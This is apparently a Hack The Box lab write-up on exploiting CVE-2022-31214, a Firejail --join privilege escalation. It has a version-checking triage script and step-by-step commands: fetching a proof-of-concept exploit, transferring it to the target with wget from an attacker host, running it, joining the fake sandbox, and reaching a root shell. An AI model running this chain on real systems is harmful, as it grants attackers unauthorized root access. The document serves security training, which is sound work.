CVE-2022-31214


A vulnerability classified as critical was found in Firejail up to and including 0.9.68 (fixed in 0.9.70). It affects the --join handling in join.c, the user namespace handler component: Firejail is installed setuid root, and the join logic did not sufficiently verify that the target PID really is one of Firejail's own sandboxes, so an unprivileged local user can prepare a look-alike sandbox process and have the privileged join enter namespaces under the attacker's control. The weakness is classified as CWE-284 (improper access control: the product does not restrict, or incorrectly restricts, access to a resource from an unauthorized actor). Successful exploitation yields a local root shell, so confidentiality, integrity, and availability are all impacted.
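Before reaching for the exploit it is worth knowing whether a host is actually exposed. The helper below is an added example, not part of the original write-up or of the Firejail project; it assumes that versions up to 0.9.68 are affected, that 0.9.70 carries the fix, and that the --join path only crosses a privilege boundary when the firejail binary is setuid root. The function names and the sample version line are this example's own.

```shell
#!/bin/sh
# Added triage helper for CVE-2022-31214 (not from the original write-up or
# from Firejail). Assumptions: Firejail <= 0.9.68 affected, 0.9.70 fixed;
# root via --join requires the firejail binary to be setuid root.

# version_lt A B: exit 0 when dotted version A is older than B.
# Non-numeric suffixes are dropped per component, so a pre-release such as
# "0.9.70rc1" is treated as the release it precedes (a known limitation).
version_lt() {
  a=$1; b=$2
  while [ -n "$a" ] || [ -n "$b" ]; do
    ai=${a%%.*}; bi=${b%%.*}
    if [ "$ai" = "$a" ]; then a=''; else a=${a#*.}; fi
    if [ "$bi" = "$b" ]; then b=''; else b=${b#*.}; fi
    ai=${ai%%[!0-9]*}; bi=${bi%%[!0-9]*}
    ai=${ai:-0}; bi=${bi:-0}
    [ "$ai" -lt "$bi" ] && return 0
    [ "$ai" -gt "$bi" ] && return 1
  done
  return 1
}

# parse_firejail_version LINE: pull "X.Y.Z" out of "firejail version X.Y.Z",
# the first line printed by `firejail --version`.
parse_firejail_version() {
  printf '%s\n' "$1" |
    sed -n 's/^firejail version[[:space:]]*\([^[:space:]]*\).*/\1/p'
}

# firejail_join_verdict VERSION IS_SETUID(yes|no): print a verdict and exit 0
# only when the unprivileged-to-root path through --join is open.
firejail_join_verdict() {
  ver=$1; suid=$2
  if ! version_lt "$ver" "0.9.70"; then
    echo "firejail $ver: not affected by CVE-2022-31214 (fixed in 0.9.70)"
    return 1
  fi
  if [ "$suid" != yes ]; then
    echo "firejail $ver: affected code, but the binary is not setuid root, so --join has no privilege boundary to cross"
    return 1
  fi
  echo "firejail $ver is setuid root: CVE-2022-31214 local root via --join is reachable"
  return 0
}

# check_local_firejail: evaluate the firejail binary installed on this host.
check_local_firejail() {
  fj=$(command -v firejail) || { echo "firejail not installed"; return 1; }
  line=$(firejail --version 2>/dev/null | head -n 1)
  ver=$(parse_firejail_version "$line")
  [ -n "$ver" ] || { echo "could not parse version from: $line"; return 1; }
  if [ -u "$fj" ]; then suid=yes; else suid=no; fi
  firejail_join_verdict "$ver" "$suid"
}

# --self-test feeds a constructed version (not read from any real host);
# --check inspects the local install. With no argument nothing runs.
case "${1:-}" in
  --self-test) firejail_join_verdict 0.9.68 yes ;;
  --check) check_local_firejail ;;
esac
```

Run it as `sh triage.sh --check` from the foothold shell: an "affected code, but not setuid" verdict means the package was installed without the setuid bit and this CVE will not hand you root, so do not waste time staging the exploit. The version comparison is deliberately self-contained rather than relying on sort -V so it behaves the same on a BusyBox-based target.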

Exploit


The advisory author has published a proof-of-concept exploit script as an attachment to the oss-security post; pull it down on Kali:

┌──(kali㉿kali)-[~/archive/htb/labs/cerberus]
└─$ curl -s https://seclists.org/oss-sec/2022/q2/att-188/firejoin_py.bin -o CVE-2022-31214.py 

Exploit script has been downloaded to Kali

Exploitation


www-data@icinga:/dev/shm$ wget -q http://10.10.14.4/CVE-2022-31214.py ; chmod 755 /dev/shm/CVE-2022-31214.py

Delivery complete

www-data@icinga:/dev/shm$ ./CVE-2022-31214.py
You can now run 'firejail --join=20928' in another terminal to obtain a shell where 'sudo su -' should grant you a root shell.

Running the script creates a fake Firejail sandbox, here PID 20928, and keeps it alive in the foreground. The next step is to join that PID with the setuid-root firejail binary from a second shell on the target and then switch to root from inside the joined shell.

www-data@icinga:/dev/shm$ ps 20928
    PID TTY      STAT   TIME COMMAND
  20928 pts/2    S+     0:00 /usr/bin/python3 /dev/shm/./CVE-2022-31214.py

That is the fake sandbox process the exploit created; it has to stay running for the join to work

www-data@icinga:/dev/shm$ /usr/bin/firejail --join=20928
changing root to /proc/20928/root
Warning: cleaning all supplementary groups
Child process initialized in 14.58 ms

Joined. The script suggests 'sudo su -', but a plain su works here as well and asks for no password, because the shell is now inside the attacker-prepared sandbox environment while the setuid binaries keep their real root privilege

www-data@icinga:/dev/shm$ su root
root@icinga:/dev/shm#
root@icinga:/dev/shm# whoami
root
root@icinga:/dev/shm# hostname
icinga
root@icinga:/dev/shm# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.16.22.2  netmask 255.255.255.240  broadcast 172.16.22.15
        inet6 fe80::215:5dff:fe5f:e801  prefixlen 64  scopeid 0x20<link>
        ether 00:15:5d:5f:e8:01  txqueuelen 1000  (Ethernet)
        RX packets 244184  bytes 36863164 (36.8 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 309821  bytes 51185436 (51.1 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 22176  bytes 1707434 (1.7 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 22176  bytes 1707434 (1.7 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

System Level Compromise